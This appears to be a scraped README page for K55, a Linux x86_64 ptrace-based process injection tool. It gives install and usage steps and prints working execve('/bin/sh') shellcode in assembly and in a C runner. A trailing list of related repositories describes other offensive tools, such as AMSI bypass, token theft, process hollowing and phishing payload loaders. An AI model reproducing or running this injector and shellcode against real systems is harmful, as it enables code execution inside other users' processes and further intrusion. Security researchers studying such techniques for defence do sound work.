Linux x86_64 Process Injection Utility | Manipulate Processes With Customized Payloads (beta)

Overview

K55 - Linux x86_64 Process Injection Utility (C++11)

lisence

About K55

(pronounced: "kay fifty-five")
The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C linux functions like ptrace(). The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target's address space. In the future, I will allow users to input there own shellcode via command line arguments.

Installation

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 Usage

Usage: ./K55 <process-name>

  • process-name can be any linux process with r-xp or execstack permissions.

Tests

Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: sudo ./K55 k55_test_process

K55 In Action

  • A shell is spawned in k55_test_process when the K55 shellcode injector is ran (as root).

Injecting Into Given Process

Shell Spawned In Target

Limitations

Obviously, ptrace(PTRACE_POKETEXT...) calls are not the most disguised. So, some applications can limit the effect of K55. Although, for security testing, make sure to turn on execstack for your target applications. For example if I'm testing on gdb, before I would inject, I would run the following: sudo execstack -s /usr/bin/gdb. Install execstack from your distrobutions package manager. For Arch Linux users, you can find execstack on the AUR.

Crafting The Shell Payload

Note: The following is a demonstration. The payload string is already hardcoded into K55.

Assembly Implementation of The Payload (Cited from shell-storm (redirect))

main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

C-Implementation of The Payload

#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

References

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

License

MIT License
Copyright (c) Josh Schiavone

You might also like...
A library to develop kernel level Windows payloads for post HVCI era
A library to develop kernel level Windows payloads for post HVCI era

A library to develop kernel level Windows payloads for post HVCI era

Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.

Overview Matryoshka loader is a tool that red team operators can leverage to generate shellcode for an egghunter to bypass size-limitations and perfor

A shellcode crypto-packing tool for PoC (used with msfvenom payloads)

crypter A shellcode crypto-packing tool for PoC (used with msfvenom/binary payloads) This tool is for proof of concept only - please use responsibly.

Multiple payloads for the digispark digistump AVR boards.

Multiple payloads for the digispark digistump AVR boards. Some are translated from RubberDucky and some are original..

Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders
Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders

Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders

A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.

This repository contains a personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to

Minecraft injection client, started as a UDP-CPP port for linux

Phantom Fully C++ Minecraft injection client for linux. Mapping code is based off of UDP, and Dear ImGui is used for the window, but the cheats and st

EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

AstoriaCore is a customized Version of AzerothCore and the private source of WaloriaCore by Fractional aka Fred.
AstoriaCore is a customized Version of AzerothCore and the private source of WaloriaCore by Fractional aka Fred.

Community driven Classless MMO Framework. Proudly founded by Lushen and based on AzerothCore and TrinityCore 😄

Releases(v1.2)
Owner
Josh Schiavone
Programmer, Offensive Security Researcher, Reverse Engineer, Founder of DoubleThreat Security.
Josh Schiavone
Injection - Windows process injection methods

Windows Process Injection Here are some popular methods used for process injection on the windows operating system. Conhost ExtraBytes PROPagate Servi

null 1.4k Dec 28, 2022
Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

Process Ghosting This is my implementation of the technique presented by Gabriel Landau: https://www.elastic.co/blog/process-ghosting-a-new-executable

hasherezade 514 Jan 3, 2023
KernelReadWriteMemory - Simple code to manipulate the memory of a usermode process from kernel.

KernelReadWriteMemory Simple proof of concept -code to manipulate the memory of a usermode process from kernelmode of a windows NT operating system. T

Zer0Mem0ry 159 Dec 27, 2022
This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate and use whatever token present at any process

StealAllTokens This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate

lab52.io 50 Dec 13, 2022
Volatile ELF payloads generator with Metasploit integrations for testing GNU/Linux ecosystems against low-level threats

Revenant Intro This tool combines SCC runtime, rofi, Msfvenom, Ngrok and a dynamic template processor, offering an easy to use interface for compiling

Red Code Labs 53 Aug 23, 2022
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Cobalt Strike BOF - Inject AMSI Bypass Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. Running inje

boku 307 Dec 28, 2022
Fluid Visualization - The code compilation is only tested on Arch Linux x86_64

Fluid Visualization The code compilation is only tested on Arch Linux x86_64, Linux kernel 5.15.13-arch1, with gcc 11.1.0, CMake 3.22.1, Xorg X server

krr 2 Jan 30, 2022
Valve's Steam Deck kernel (5.13.10; x86_64; linux-neptune)

Linux kernel ============ There are several guides for kernel developers and users. These guides can be rendered in a number of formats, like HTML an

Adam Jafarov 6 Aug 6, 2022
Treexy is a library that implements a compact hierarchical data structure that can store and manipulate volumetric data, discretized on a three-dimensional grid

Treexy is a library that implements a compact hierarchical data structure that can store and manipulate volumetric data, discretized on a three-dimens

Davide Faconti 324 Jan 4, 2023
A Quake Enhanced mod to manipulate entities. Inspired by the Half-Life metamod plugin 'Entmod'

QEEntmod A Quake Enhanced mod to manipulate entities. Inspired by the Half-Life metamod plugin 'Entmod' Can be used standalone or easily implemented i

null 2 Jul 5, 2022